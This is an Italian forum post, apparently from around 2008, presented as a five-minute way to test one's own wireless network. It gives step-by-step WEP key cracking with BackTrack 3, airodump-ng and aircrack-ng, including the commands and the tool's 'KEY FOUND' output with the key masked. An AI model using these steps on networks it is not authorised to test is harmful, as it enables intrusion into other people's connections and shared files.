• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Wireless hack - testiamo la nostra linea senza fili in soli 5minuti and 10secondi

Giuppe

Utente Esperto
Autore del topic
15 Gennaio 2008
1.144
0
Miglior risposta
0
Dovete testare la vostra linea wireless ed avete poco tempo? Come tutti ben sappiamo il pericolo è sempre dietro l’angolo e per questo è necessario prevenire, scopriremo oggi come un qualsiasi malintenzionato potrebbe facilmente accedere alla nostra connessione internet, sfruttarla, ed entrare in possesso dei vostri file condivisi; il tutto in 5minuti e 10 secondi.

Componenti utilizzati:

- 1 router wi-fi collegato al fisso

- 1 portatile avente scheda wireless.

Ricordo che in questo procedimento ho cercato di eliminare ogni passaggio superfluo, riducendo i tempi ed ottimizzando l’intera procedura.

1) Inseriamo la distro live di backtrack3 nel laptop e carichiamola.

2) Apro il terminale e digitiamo “iwconfig” –>controllo che non sia associata a niente la scheda, essendo la distro live, come impostazione di default non dovreste modificare niente.

3)da terminale “airodump-ng -c 11 –write dump wlan0 “, dove 11–>è il canale e wlan0 è l’interfaccia.

4) una volta raccolti circa 50000 pacchetti…ci ha messo davvero pochissimo..ho dato da terminale:

aircrack-ng -z -b mac_ap dump-01*.cap

*mac_ap: è ovviamente il mac della scheda “vittima”

* dump-01.cap –> è il nome del file con il quale i pacchetti vengono catturati(ho notato che questo valore è incrementale).

dopo circa dieci secondi la shell mi restituisce:

opening dump-01.cap
attack will be restarted every 5000 captured ivs.
starting PTW attack with 50518ivs.
KEY FOUND! [1*:77:1E:1*:*8]
Decrypted correctly: 100%

Per motivi di privacy ovviamente ho alterato la pass con degli asterischi, fatene buon uso, ricordo che violare reti altrui è illegale e punibile.

Alcune precisazioni:

- la chiave in questione era una wep a 64bit

- il router era un Netgear v3

- Per capire il tutorial bisogna avere una minima base.

-----------------------------------------------------
Fonte:
Perfavore, Entra oppure Registrati per vedere i Link!
 
Copiata da quella che ho postato in the big boss forum...
Comunque Ottima, hai fatto bene a postarla ^^